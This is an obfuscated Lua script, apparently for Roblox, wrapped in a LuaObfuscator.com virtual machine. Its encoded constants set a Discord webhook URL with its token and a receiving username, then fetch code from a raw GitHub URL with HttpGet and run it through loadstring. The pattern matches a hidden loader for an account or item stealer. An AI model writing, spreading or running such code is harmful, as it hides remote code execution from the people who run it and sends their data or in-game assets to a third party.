--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v83=v2(v0(v30,16));if v19 then local v89=v5(v83,v19);v19=nil;return v89;else return v83;end end end);local function v20(v31,v32,v33)if v33 then local v84=(v31/((5 -3)^(v32-(2 -1))))%(2^(((v33-(1 -0)) -(v32-(2 -1))) + ((1497 -(282 + 595)) -(555 + 64)))) ;return v84-(v84%(932 -(857 + 74))) ;else local v85=(570 -(367 + (1838 -(1523 + 114))))^(v32-(928 -(214 + 713))) ;return (((v31%(v85 + v85))>=v85) and (1 + 0)) or (0 + 0) ;end end local function v21()local v34=0 -0 ;local v35;while true do if (v34==(1 + 0)) then return v35;end if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + (1066 -(68 + 997)) ;v34=1271 -((343 -(32 + 85)) + 1044) ;end end end local function v22()local v36=0 + 0 ;local v37;local v38;while true do if (v36==(0 + 0)) then v37,v38=v1(v16,v18,v18 + ((1309 -(87 + 263)) -(892 + (245 -(67 + 113)))) );v18=v18 + (4 -2) ;v36=1;end if (v36==(1 -0)) then return (v38 * (469 -(157 + 56))) + v37 ;end end end local function v23()local v39,v40,v41,v42=v1(v16,v18,v18 + ((18 -11) -4) );v18=v18 + 4 ;return (v42 * (12338840 + 4438376)) + (v41 * ((472484 -212013) -194935)) + (v40 * (1208 -(584 + 218 + 150))) + v39 ;end local function v24()local v43=(3639 -2642) -((3249 -2334) + 82) ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(5 -3)) then v48=v20(v45,13 + 8 ,40 -9 );v49=((v20(v45,1219 -((2207 -(116 + 1022)) + 118) )==1) and  -(2 -1)) or (1 -0) ;v43=3;end if (v43==(0 + (859 -(814 + 45)))) then v44=v23();v45=v23();v43=1 -0 ;end if (v43==(3 + 0)) then if (v48==((1948 -1157) -(368 + (1760 -1337)))) then if (v47==(0 -0)) then return v49 * (18 -(6 + 4 + 8)) ;else v48=1;v46=0;end elseif (v48==2047) then return ((v47==0) and (v49 * ((3 -2)/((24 + 418) -(416 + 26))))) or (v49 * NaN) ;end return v8(v49,v48-(3266 -2243) ) * (v46 + (v47/((1 + 1)^((33 + 58) -39)))) ;end if ((439 -(145 + 293))==v43) then v46=431 -((929 -(261 + 624)) + 386) ;v47=(v20(v45,1487 -(998 + 488) ,20) * ((1 + 1)^(27 + 5))) + v44 ;v43=774 -(201 + 571) ;end end end local function v25(v50)local v51;if  not v50 then v50=v23();if (v50==(0 -0)) then return "";end end v51=v3(v16,v18,(v18 + v50) -(1081 -(1020 + 60)) );v18=v18 + v50 ;local v52={};for v66=1424 -(630 + 793) , #v51 do v52[v66]=v2(v1(v3(v51,v66,v66)));end return v6(v52);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=786 -(265 + 521) ;local v54;local v55;local v56;local v57;local v58;local v59;while true do local v68=0;while true do if (v68~=0) then else if (v53==0) then local v94=0;while true do if (v94~=(3 -1)) then else v53=1;break;end if (v94==(0 -0)) then v54={};v55={};v94=1 + 0 ;end if (v94==(1637 -(1373 + 263))) then v56={};v57={v54,v55,nil,v56};v94=2 -0 ;end end end if (v53~=2) then else for v96=1,v23() do local v97=0 -0 ;local v98;local v99;local v100;local v101;while true do if (v97==(1386 -(746 + 638))) then while true do if (v98~=(0 + 0)) then else local v148=0 -0 ;while true do if (v148==0) then v99=341 -(218 + 123) ;v100=nil;v148=1582 -(1535 + 46) ;end if (v148~=1) then else v98=1 + 0 ;break;end end end if (v98==1) then v101=nil;while true do if (v99~=1) then else while true do if (v100~=(0 + 0)) then else v101=v21();if (v20(v101,1,561 -(306 + 254) )~=(0 + 0)) then else local v171=0 -0 ;local v172;local v173;local v174;local v175;while true do if (v171~=0) then else local v176=1467 -(899 + 568) ;while true do if (v176==(0 + 0)) then v172=0 -0 ;v173=nil;v176=1;end if (v176==1) then v171=1;break;end end end if (v171~=(605 -(268 + 335))) then else while true do if (v172~=(292 -(60 + 230))) then else local v179=0;local v180;local v181;while true do if (v179==(572 -(426 + 146))) then v180=0 + 0 ;v181=nil;v179=1457 -(282 + 1174) ;end if ((812 -(569 + 242))==v179) then while true do if (0==v180) then v181=0;while true do if (0~=v181) then else local v193=0 -0 ;local v194;while true do if (v193~=0) then else v194=0;while true do if (0~=v194) then else local v203=0 + 0 ;while true do if (v203==0) then if (v20(v174,1,1025 -(706 + 318) )~=1) then else v175[1253 -(721 + 530) ]=v59[v175[2]];end if (v20(v174,1273 -(945 + 326) ,4 -2 )~=1) then else v175[3 + 0 ]=v59[v175[703 -(271 + 429) ]];end v203=1;end if ((1 + 0)~=v203) then else v194=1501 -(1408 + 92) ;break;end end end if (v194==(1087 -(461 + 625))) then v181=1289 -(993 + 295) ;break;end end break;end end end if (v181==(1 + 0)) then v172=1174 -(418 + 753) ;break;end end break;end end break;end end end if (1==v172) then local v182=0;while true do if (v182~=(1 + 0)) then else v172=1 + 1 ;break;end if ((0 + 0)~=v182) then else local v189=0 + 0 ;while true do if (v189~=(529 -(406 + 123))) then else v175={v22(),v22(),nil,nil};if (v173==(1322 -(1249 + 73))) then local v191=0 + 0 ;local v192;while true do if (v191~=(1145 -(466 + 679))) then else v192=0 -0 ;while true do if (v192==(0 -0)) then v175[1903 -(106 + 1794) ]=v22();v175[2 + 2 ]=v22();break;end end break;end end elseif (v173==1) then v175[1 + 2 ]=v23();elseif (v173==(5 -3)) then v175[3]=v23() -(2^16) ;elseif (v173==(7 -4)) then local v200=0;local v201;local v202;while true do if (v200~=(115 -(4 + 110))) then else while true do if ((584 -(57 + 527))~=v201) then else v202=0;while true do if (0==v202) then v175[3]=v23() -((1429 -(41 + 1386))^(119 -(17 + 86))) ;v175[3 + 1 ]=v22();break;end end break;end end break;end if (v200~=(0 -0)) then else v201=0;v202=nil;v200=1;end end end v189=1;end if (v189~=1) then else v182=1;break;end end end end end if (v172==(0 -0)) then local v183=0;local v184;local v185;while true do if (v183~=(167 -(122 + 44))) then else while true do if (v184==(0 -0)) then v185=0;while true do if (v185~=0) then else local v195=0 -0 ;while true do if (v195~=1) then else v185=1 + 0 ;break;end if (v195~=0) then else v173=v20(v101,1 + 1 ,5 -2 );v174=v20(v101,4,6);v195=1;end end end if (v185==1) then v172=1;break;end end break;end end break;end if (v183==(65 -(30 + 35))) then v184=0;v185=nil;v183=1;end end end if (v172==(3 + 0)) then if (v20(v174,3,1260 -(1043 + 214) )~=1) then else v175[15 -11 ]=v59[v175[4]];end v54[v96]=v175;break;end end break;end if ((1213 -(323 + 889))==v171) then local v177=0 -0 ;local v178;while true do if (v177==(580 -(361 + 219))) then v178=320 -(53 + 267) ;while true do if (v178==0) then local v190=0 + 0 ;while true do if (v190==(414 -(15 + 398))) then v178=983 -(18 + 964) ;break;end if (v190==(0 -0)) then v174=nil;v175=nil;v190=1;end end end if (v178~=(1 + 0)) then else v171=2 + 0 ;break;end end break;end end end end end break;end end break;end if (v99~=0) then else local v162=850 -(20 + 830) ;while true do if ((0 + 0)==v162) then local v170=126 -(116 + 10) ;while true do if (v170==(1 + 0)) then v162=1;break;end if (v170==(738 -(542 + 196))) then v100=0 -0 ;v101=nil;v170=1;end end end if ((1 + 0)==v162) then v99=1;break;end end end end break;end end break;end if (v97==(1 + 0)) then v100=nil;v101=nil;v97=1 + 1 ;end if (v97~=0) then else v98=0;v99=nil;v97=2 -1 ;end end end for v102=2 -1 ,v23() do v55[v102-(1552 -(1126 + 425)) ]=v28();end return v57;end v68=406 -(118 + 287) ;end if (v68~=(3 -2)) then else if ((1122 -(118 + 1003))==v53) then local v95=0;while true do if (v95~=(2 -1)) then else for v105=1,v58 do local v106=377 -(142 + 235) ;local v107;local v108;local v109;while true do if ((0 -0)==v106) then v107=0 + 0 ;v108=nil;v106=1;end if (v106==(978 -(553 + 424))) then v109=nil;while true do if ((1 -0)==v107) then if (v108==1) then v109=v21()~=0 ;elseif (v108==2) then v109=v24();elseif (v108==(3 + 0)) then v109=v25();end v59[v105]=v109;break;end if (v107~=(0 + 0)) then else local v164=0 + 0 ;while true do if (v164==1) then v107=1;break;end if (v164==0) then v108=v21();v109=nil;v164=1 + 0 ;end end end end break;end end end v57[2 + 1 ]=v21();v95=2;end if (v95~=(0 -0)) then else v58=v23();v59={};v95=1;end if (v95~=2) then else v53=2;break;end end end break;end end end end local function v29(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v69=v63;local v70=v64;local v71=v65;local v72=v27;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v86=0,v77 do if (v86>=v71) then v75[v86-v71 ]=v76[v86 + 1 ];else v79[v86]=v76[v86 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do v81=v69[v73];v82=v81[1];if (v82<=10) then if (v82<=4) then if (v82<=1) then if (v82==0) then if (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end else v79[v81[2]]=v81[3]~=0 ;end elseif (v82<=2) then do return;end elseif (v82>3) then v79[v81[2]]=v81[3];else local v127=0;local v128;while true do if (0==v127) then v128=v81[2];v79[v128]=v79[v128](v13(v79,v128 + 1 ,v74));break;end end end elseif (v82<=7) then if (v82<=5) then local v111=0;local v112;local v113;while true do if (v111==1) then v79[v112 + 1 ]=v113;v79[v112]=v113[v81[4]];break;end if (0==v111) then v112=v81[2];v113=v79[v81[3]];v111=1;end end elseif (v82==6) then v79[v81[2]]=v62[v81[3]];else local v131=v81[2];local v132,v133=v72(v79[v131](v13(v79,v131 + 1 ,v81[3])));v74=(v133 + v131) -1 ;local v134=0;for v154=v131,v74 do local v155=0;while true do if (v155==0) then v134=v134 + 1 ;v79[v154]=v132[v134];break;end end end end elseif (v82<=8) then v79[v81[2]]();elseif (v82>9) then if (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end else v79[v81[2]][v81[3]]=v81[4];end elseif (v82<=15) then if (v82<=12) then if (v82>11) then v79[v81[2]]=v81[3];else local v116=v81[2];local v117=v79[v81[3]];v79[v116 + 1 ]=v117;v79[v116]=v117[v81[4]];end elseif (v82<=13) then v79[v81[2]]();elseif (v82==14) then local v137=0;local v138;local v139;local v140;local v141;while true do if (v137==2) then for v167=v138,v74 do v141=v141 + 1 ;v79[v167]=v139[v141];end break;end if (v137==0) then v138=v81[2];v139,v140=v72(v79[v138](v13(v79,v138 + 1 ,v81[3])));v137=1;end if (v137==1) then v74=(v140 + v138) -1 ;v141=0;v137=2;end end else local v142=0;local v143;while true do if (v142==0) then v143=v81[2];v79[v143]=v79[v143](v13(v79,v143 + 1 ,v74));break;end end end elseif (v82<=18) then if (v82<=16) then v73=v81[3];elseif (v82==17) then do return;end else v79[v81[2]]=v62[v81[3]];end elseif (v82<=19) then v79[v81[2]][v81[3]]=v81[4];elseif (v82==20) then v73=v81[3];else v79[v81[2]]=v81[3]~=0 ;end v73=v73 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3O312O373436323537362O382O30323635302F4952394A6B373349592D5F6E6974436756744834306D70724E38425A614A6835576475705F4435642O4F3577556F544F584D444F573252734C6B75675F506C4C46597735030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D6503063O0067745F6F723203093O00557365724E616D653200173O0012043O00013O00260A3O000E000100020004143O000E0001002O12000100033O003009000100040005002O12000100063O002O12000200073O00200B000200020008001204000400094O0015000500014O000E000200054O000F00013O00022O00080001000100010004143O0016000100260A3O0001000100010004143O00010001002O12000100033O0030090001000A000B002O12000100033O0030090001000C000B0012043O00023O0004143O000100012O00023O00017O00",v9(),...);end
